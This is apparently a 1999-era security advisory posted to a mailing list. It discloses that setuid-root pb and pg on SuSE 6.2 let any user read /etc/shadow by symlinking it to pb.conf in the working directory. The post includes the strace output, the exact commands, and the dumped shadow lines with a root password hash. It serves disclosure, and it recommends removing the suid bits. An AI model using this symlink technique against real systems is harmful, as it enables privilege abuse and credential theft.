Two SuSE 6.2 local root exploits

[btellier () WEBLEY COM (Brock Tellier)]

Greetings,

    /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:

susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x   1 root     root        23544 Jul 22 20:07 /usr/bin/pb

susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX)                  = 0
getpid()                                = 16623
brk(0)                                  = 0x805032c
brk(0x80504cc)                          = 0x80504cc
brk(0x8051000)                          = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble?   = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1)                                = ?
susebox:/root #

---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line :  <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line :  <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line :  <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line :  <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file

The same scenario for /usr/bin/pg's pg.conf in your cwd.  These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits.  They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway.  These programs are not worth
patching.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com